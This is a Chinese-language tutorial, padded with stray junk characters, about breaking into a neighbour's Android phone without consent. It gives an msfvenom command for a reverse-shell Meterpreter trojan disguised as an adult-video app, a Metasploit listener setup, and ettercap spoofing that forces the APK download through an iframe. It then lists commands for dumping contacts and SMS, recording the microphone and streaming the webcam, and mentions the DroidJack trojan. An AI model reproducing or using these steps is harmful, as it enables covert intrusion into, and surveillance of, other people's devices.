* W0 B, {. }/ z% A6 e" j
五、msf+ettercap入侵邻居安卓手机 8 C8 A7 e4 a5 E8 \% F1 G5 v
* s8 }4 ^4 p3 q) c- s
# q, ^6 B& X! _8 o1 G 首先启动msf
; @: d; G7 [ p5 r4 m 0 z$ r2 @9 l6 E: o6 V
. F. ]' [/ |; a' V# D. R1 o2 j( ` 先用kali生成一个安卓木马,如下命令:
& H7 P, Q* @4 n9 N1 ?$ F
: l; K! o4 M J2 n2 a3 d7 m9 k: l0 Q! c7 @
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
% i7 M( a q, c8 A+ {
; a1 {' T& e7 ?) X+ X
_) c6 J5 f. ?8 t U4 N 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 # i! O' L) L8 Z3 ^; n. P% p" t% s
$ U$ h9 w6 r# {: s7 q5 [
& c5 g* O2 u- e. r' B/ Q' Z
然后进入msf ) O v( b# {2 i
, d+ R# k2 V/ w& [4 y/ r3 N
' x' \8 i; t. S, S& L1 l$ ?; _4 E use exploit/multi/handler + e- t( X" b$ Y+ r* w
( t6 ?2 m2 X7 O* L4 W) q
+ t8 g- ~6 p8 N- i4 b# }, Y set payload android/meterpreter/reverse_tcp " S1 ^: Z" w& I5 t8 i5 D
4 p% Z. Q2 R+ x' r5 \& W* o; J+ k5 O" m2 y' B0 ]$ \
set LHOST 192.168.0.109 //ip为kaili的ip - i% B+ {$ @) [) N4 n
9 }/ a" b4 n1 `4 J1 N( C
: |2 v: @6 S' d( U, J set LPORT 44444 //端口一定要与前面生成的木马的端口一致
A( {6 u. r' m7 t
7 p; Z1 B( a) \
* z7 n7 O5 D4 P7 k Exploit
* Y1 [% X7 |1 c/ K; B
" R& F$ _/ H( U* {- C! m y. t! g0 o4 w3 ?
9 s3 q2 Y! |' _2 p8 h
" F5 W; s& u# E# o3 Z4 @
( Z) t" p6 }+ _. g+ j( P$ I6 G 下面我们开启ettercap -G + } y- j1 A0 ]9 i6 l
( |! O# w1 v R$ r0 j% p: D; e
$ Y( r, ~9 o X( a 我物理IP为
. V& w* V% a& J + ^; v: K4 H+ |% {# F4 \1 A
% R8 y) C: B: o t
x6 u) `0 E4 i " _8 s. U5 \; M, _0 I
0 [ [ U8 @" S* H4 @# s2 j
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 7 p6 L; e& H$ o/ \- O
% {; C) ~; c2 h+ ]& |
+ t: n1 v ]/ D' z; ], r 下面我们来设置一下
1 h; K* x5 s- v/ p9 V l- z" D# C1 m
9 y( D! H' b5 G. A) d! ?
1 {( U9 a+ c2 X6 W5 P! P ; j4 m t' a4 n; h
/ [, r# o d7 h* @5 `
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
- J% L! g$ |/ d, {* P / n+ G( h( f/ z0 ]
- j/ E* P$ \$ O1 r3 ?+ `( g
, k- p( r4 T7 \% B; N/ A8 }
. T2 u% ~# u4 v8 a2 [# N
! z {1 S6 f5 M. S
. ^9 L$ _. @: {# i# H& [. L
2 C0 C$ }8 }' X9 V) F1 D; ]. Y% N q3 n: r$ H. _9 X+ b: ~ A' W5 o
5 X% B. b' T: a) X. ?, \
$ L5 I# _2 F+ m& ~# w' P, s5 u" V& w" O8 C! [) r* K
3 R. y' ?! s4 O7 w7 ~3 V
2 U# ~# `( n$ k, b" Z: Z0 |: F$ e9 I) v2 U; t) I
7 ?8 _& w6 h" N1 Q
* v& ` Z/ e$ i5 R/ C$ `$ w% E- ~/ g& s ^3 U/ i. {% s2 c
3 n5 E) Y8 P* D
7 U6 @5 Y% M8 ?- F. ~7 m! B
$ h& u4 H; c ]+ K- r8 N& C
( [( H6 u( Q& ?. E/ f4 z( S 7 p0 b' ~% O2 O- R
8 J+ Q+ b# g( I% C+ t+ q ) v. Z3 W6 Q# |' `. U; a' h3 B' a
% h- S* x2 \9 R+ i+ Q
# d- @" h; {+ [( ?1 \
9 G8 T" Z* ~ z5 W& S, C; Q 5 r. P1 U5 W$ L9 C
/ d% {7 T2 c% D: }. [
( Y$ h( M8 \6 B0 a' Y0 k; I- {
; o4 X7 `0 `; Q5 D$ {$ B6 [
( F F- N' q) T4 [+ G2 X7 V . U* y7 `/ |2 o
% }0 H+ z+ O) [9 D/ n
' W/ I$ b/ D( X; ~5 ^0 }& ~! r/ F
7 O' @1 P& F# H M( T 0 ]) F! K/ s/ G' j7 }8 o% G
: W6 h- b9 K* w$ A3 d* s5 Q
" K( ]# m( b d9 o: s1 L" ]9 w
' X/ [+ |9 \: G2 f* N- C1 b/ b7 q4 x" Y; l( y# t. u% O3 h1 n
下面我们开始攻击
5 t; g( M+ A. Q3 M ^, E6 h 6 \4 Q, k- W! i* R
9 r% }4 s6 z$ Q0 @' S! p 4 E( c& `( p4 r, e1 k) V
& [% }7 P, g6 Z" k" q# Z( |4 N
: m% ?" e5 I0 z
/ u) e$ D5 k, W* \7 ?$ Y. u * B. \ g* w' L& L& c1 G
8 K) Z, J( A0 A, e/ c: }" O
: k8 R" N; M0 T7 n$ Q# |
0 F V/ [4 }+ a/ N; h, j, P: P) R9 ^
7 w" w6 B: ~3 d; d, w. a
' z- d: ?+ x1 j! ?. C
2 p) k* q1 e/ G, ]" Z; Y5 Z
3 Q3 @( \8 L+ N) o 4 `! q7 G3 n0 N9 |% p! H, S8 V
- g; H' L: I! s$ T
大概过了5分钟多,发现反弹成功了
7 A; Y" x# N; H2 w- R0 o; `8 J1 ` + c% T9 D$ ~% X7 F$ k J) r- a
1 b$ _$ p' u; y4 w / B, {4 W2 N, G/ o: N* L: K+ Y
, Y7 s: C' a' C* v: K
; A8 a; m% y3 s
, l0 e1 u/ v4 q" W1 Q0 T6 ~5 b
, E& X3 X( x3 ~' ^0 |" w2 r. {
* g* ~9 F* }" }, o & _4 M" J3 D! o; w2 b
. J8 r; k0 }7 x/ }) B, b8 R
8 x1 ?8 V0 B: K7 l
( I0 m9 {5 p8 A7 l }2 L , J3 `( |9 p! c- A& r. F
+ W/ G5 a4 z- v# [+ ^
5 X" u$ i% d+ ^0 V2 J l/ R U6 C8 L, _) ?, U9 @
( j* F s+ D6 A8 J
% i) {! k2 c+ U4 U# U2 Z6 @; z
# I1 n' _7 F0 V4 Z; C( i
; o0 |1 ]" e6 u: N7 C) O$ _9 M
! q& g- S, b- m' P$ [! x
1 K( }/ v9 ?2 ]! `
2 j& i) B2 ]$ r+ x9 ?# \ 执行命令 8 y' w/ C* w2 `/ i. [7 ~+ \
, t O0 V; A9 Y1 C5 {# I+ j
7 C, z* R5 U( ~/ k( ]
) }7 d; h: i q: o0 R5 P ?- S
% l- i2 l O4 o m# d" _. k
7 T! \8 \; g, Z5 `6 M dump_contacts --》这个是导出电话
/ Q( c) [! k% G% s' h ' _* P; h5 V1 B' z* D/ A3 S
3 v. X" e& n# l O% z4 c( \; h5 X dump_sms --》这个是导出信息
/ j4 m f U9 S/ S0 N% W {8 t 6 B# I1 G7 G! X; F Y/ u4 r
& W0 o% k1 I+ W, M9 D( P record_mic Record audio from the default microphone for X seconds
/ P7 E* _& e, E3 ]* @
0 x; z5 u/ y; B1 F" T2 W K+ {- Z# ]( z; Z5 P
webcam_chat Start a video chat
7 b) j; g5 x3 X" }9 e ! t+ }. k, [2 z7 B4 ^& a2 X3 l
. w8 p V$ _1 D2 c/ [
webcam_list List webcams
4 S3 a) m7 p* p w) Q
$ i' V) N! Q6 R5 a
$ F/ \+ v$ z* @# ^: b) y webcam_snap Take a snapshot from the specified webcam 2 d8 V: \" N }" x; ^6 j+ n6 R
/ t2 B- Q3 T. ]: v& ?. c; _" [$ O$ o& j: i5 b3 \
webcam_stream  lay a video stream from the specified webcam ! C8 [7 H" _! H
& t* ?; j3 W! |% t9 e9 S4 S3 _! E$ ]2 x0 @( @% V2 e
) X$ w Q" ?: W, I
, u: Y2 j9 y2 Y6 `1 C1 L- V+ f5 t, K2 a) B4 p5 b/ H% e' S
/ {5 c6 r ]# n- l2 p. g) A% j
' ^; {6 `$ n) W/ ?4 d U5 D, a2 n# K; ^1 v% y6 q
我们打开看一下电话薄, * O) l _! f. _0 R# c
5 @$ a# R+ I) D+ c# d1 w6 L1 F* q2 e+ `5 l4 U% b
$ n6 G4 t/ F7 o$ b
$ Q N' P" T {6 ?/ [" ^
. |6 s1 h3 `, s6 l - z7 ]! F( g# J3 |
3 c! s" H2 X( O) Q$ g
* k" U: o9 C$ J
' l" A8 l J3 } u/ h @
. x' N+ Q7 V4 J" T3 S/ b# f$ k0 [" C8 x: z, G. ]* j) }% c
8 ? l2 V/ ^) n/ C8 x7 ~) ]/ e0 t! [
$ G0 Q8 V5 k' @! c8 ?! }6 }; ]7 L/ M( J5 ]( d
% E/ z( g) c Q3 n$ w; I
' e5 f6 @8 Q- `& _7 `" C4 U: W
$ K, Q) T$ F* P# [( L $ l6 ]/ t9 L$ K+ v/ _8 X1 X( s; X, ~
7 D7 \- Y0 F' b' Z3 g; @
' C' ?! r8 E1 {5 T9 d- d 我们同时欺骗成DroidJack木马,使用方法如图:
; @4 x0 i& r# a0 c/ K 7 W7 Z# w& B- H2 @* [# T/ ^6 k
2 f0 N* F* Q9 l4 S/ _0 y1 R
2 A9 i5 Q3 X0 w% t4 v6 y! ?
2 g) h U. v$ L! B7 A
" A) _# D% g, _9 v0 O
* d; [; S+ ^4 e4 s
: E- m3 x" H, ^: M+ ^# f; D& n. m9 V
9 \3 |% O0 O: \7 K
9 m$ ?" V% F" h+ m
3 J2 p8 c3 S6 s- z ~
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
( l: y$ ~7 a. L6 n3 U: L+ R5 Y$ S! n 6 B# ]7 e5 U5 p( L
, U$ S# }& n$ h% n7 \5 p
& {( K8 R' |; e1 R1 r( [+ L/ ?* n 9 d$ C: I f$ Z0 R+ ^# M
0 U% S: X0 [6 a% K3 G
6 ?* ?2 p3 R3 z- }$ }0 Y, X
+ Z0 e) c" Z4 P2 g- s( r8 e$ D4 s
) ^5 W& D: I0 F" p% o0 d: k1 t
* O* N6 V' n! [7 c6 n0 A- W ( r+ x: \3 q: d% J
" t" N( h4 }! R6 X
% X E; j P! r" m* D! {% ]
: F6 S' j( W0 z( u8 w. \# w6 Z$ ]; H/ @" ?
8 ]) |- _) }: v/ A, J0 [) A" Z" D |